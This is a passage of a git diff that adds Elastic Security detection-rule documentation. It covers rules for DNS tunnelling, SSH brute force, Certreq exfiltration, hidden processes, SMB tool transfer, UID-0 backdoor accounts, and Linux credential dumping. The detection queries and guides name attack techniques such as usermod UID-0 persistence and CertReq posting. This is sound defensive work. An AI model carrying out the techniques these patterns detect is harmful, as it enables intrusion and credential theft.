Office\\root\\Office*\\WINWORD.EXE", + "?:\\Program Files?(x86)\\Microsoft Office\\root\\Office*\\WINWORD.EXE", + "?:\\Windows\\System32\\Dism.exe", + "?:\\Windows\\SysWOW64\\Dism.exe", + "?:\\Windows\\System32\\inetsrv\\w3wp.exe") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc new file mode 100644 index 0000000000..50079d097c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup]] +=== Potential DNS Tunneling via NsLookup + +This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. + +*Rule type*: threshold + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential DNS Tunneling via NsLookup + +Attackers can abuse existing network rules that allow DNS communication with external resources to use the protocol as their command and control and/or exfiltration channel. + +DNS queries can be used to infiltrate data such as commands to be run, malicious files, etc., and also for exfiltration, since queries can be used to send data to the attacker-controlled DNS server. This process is commonly known as DNS tunneling. + +More information on how tunneling works and how it can be abused can be found on [Palo Alto Unit42 Research](https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors). + +#### Possible investigation steps + +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the DNS query and identify the information sent. +- Extract this communication's indicators of compromise (IoCs) and use traffic logs to search for other potentially compromised hosts. + +### False positive analysis + +- This mechanism can be used legitimately. If the parent process is trusted and the data sent is not sensitive nor command and control related, this alert can be closed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Immediately block the identified indicators of compromise (IoCs). +- Implement any temporary network rules, procedures, and segmentation required to contain the attack. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Update firewall rules to be more restrictive. +- Reimage the host operating system or restore the compromised files to clean versions. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and event.type:start and process.name:nslookup.exe and process.args:(-querytype=* or -qt=* or -q=* or -type=*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: DNS +** ID: T1071.004 +** Reference URL: https://attack.mitre.org/techniques/T1071/004/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc new file mode 100644 index 0000000000..98b6329730 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected]] +=== Potential External Linux SSH Brute Force Detected + +Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. + +*Rule type*: eql + +*Rule indices*: + +* logs-system.auth-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential External Linux SSH Brute Force Detected + +The rule identifies consecutive SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts. + +This rule will generate a lot of noise for systems with a front-facing SSH service, as adversaries scan the internet for remotely accessible SSH services and try to brute force them to gain unauthorized access. + +In case this rule generates too much noise and external brute forcing is of not much interest, consider turning this rule off and enabling "Potential Internal Linux SSH Brute Force Detected" to detect internal brute force attempts. + +#### Possible investigation steps + +- Investigate the login failure user name(s). +- Investigate the source IP address of the failed ssh login attempt(s). +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. + +### False positive analysis + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Infrastructure or availability issue. + +### Related Rules + +- Potential Internal Linux SSH Brute Force Detected - 1c27fa22-7727-4dd3-81c0-de6da5555feb +- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, source.ip, user.name with maxspan=15s + [ authentication where host.os.type == "linux" and + event.action in ("ssh_login", "user_login") and event.outcome == "failure" and + not cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", + "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", + "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", + "::1", "FE80::/10", "FF00::/8") ] with runs = 10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc new file mode 100644 index 0000000000..fc8c16ce65 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc @@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-potential-file-transfer-via-certreq]] +=== Potential File Transfer via Certreq + +Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Certreq/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Command and Control +* Tactic: Exfiltration +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "CertReq.exe" or process.pe.original_file_name == "CertReq.exe") and process.args : "-Post" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc new file mode 100644 index 0000000000..eec90508bc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc @@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid]] +=== Potential Hidden Process via Mount Hidepid + +Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and process.name == "mount" and event.action == "exec" and +process.args == "/proc" and process.args == "-o" and process.args : "*hidepid=2*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc new file mode 100644 index 0000000000..2642832ad8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected]] +=== Potential Internal Linux SSH Brute Force Detected + +Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. + +*Rule type*: eql + +*Rule indices*: + +* logs-system.auth-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Internal Linux SSH Brute Force Detected + +The rule identifies consecutive internal SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts. + +#### Possible investigation steps + +- Investigate the login failure user name(s). +- Investigate the source IP address of the failed ssh login attempt(s). +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. + +### False positive analysis + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Infrastructure or availability issue. + +### Related Rules + +- Potential External Linux SSH Brute Force Detected - fa210b61-b627-4e5e-86f4-17e8270656ab +- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, source.ip, user.name with maxspan=15s + [ authentication where host.os.type == "linux" and + event.action in ("ssh_login", "user_login") and event.outcome == "failure" and + cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", + "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", + "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", + "::1", "FE80::/10", "FF00::/8") ] with runs = 10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc new file mode 100644 index 0000000000..7edb437f7e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share]] +=== Potential Lateral Tool Transfer via SMB Share + +Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Lateral Tool Transfer via SMB Share + +Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees frequently access to host malicious files to gain a foothold in other machines. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve the created file and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges needed to write to the network share and restrict write access as needed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=30s + [network where host.os.type == "windows" and event.type == "start" and process.pid == 4 and destination.port == 445 and + network.direction : ("incoming", "ingress") and + network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" + ] by process.entity_id + /* add more executable extensions here if they are not noisy in your environment */ + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and + (file.Ext.header_bytes : "4d5a*" or file.extension : ("exe", "scr", "pif", "com", "dll"))] by process.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc new file mode 100644 index 0000000000..b58e4524f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation]] +=== Potential Linux Backdoor User Account Creation + +Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Linux Backdoor User Account Creation + +The `usermod` command is used to modify user account attributes and settings in Linux-based operating systems. + +Attackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account. + +This rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible investigation steps +- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes. + - !{osquery{"label":"Osquery - Retrieve User Accounts with a UID of 0","query":"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'"}} +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} +- Identify if the account was added to privileged groups or assigned special privileges after creation. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific Group","query":"SELECT * FROM groups WHERE groupname = {{group.name}}"}} +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Delete the created account. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event") and process.name == "usermod" and +process.args : "-u" and process.args : "0" and process.args : "-o" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create Account +** ID: T1136 +** Reference URL: https://attack.mitre.org/techniques/T1136/ +* Sub-technique: +** Name: Local Account +** ID: T1136.001 +** Reference URL: https://attack.mitre.org/techniques/T1136/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc new file mode 100644 index 0000000000..242e0297be --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc @@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem]] +=== Potential Linux Credential Dumping via Proc Filesystem + +Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/huntergregal/mimipenguin +* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.parent.name,host.name with maxspan=1m +[process where host.os.type == "linux" and process.name == "ps" and event.action == "exec" + and process.args in ("-eo", "pid", "command") ] + +[process where host.os.type == "linux" and process.name == "strings" and event.action == "exec" + and process.args : "/tmp/*" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Proc Filesystem +** ID: T1003.007 +** Reference URL: https://attack.mitre.org/techniques/T1003/007/ +* Technique: +** Name: Exploitation for Credential Access +** ID: T1212 +** Reference URL: https://attack.mitre.org/techniques/T1212/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc new file mode 100644 index 0000000000..550e436642 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow]] +=== Potential Linux Credential Dumping via Unshadow + +Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk 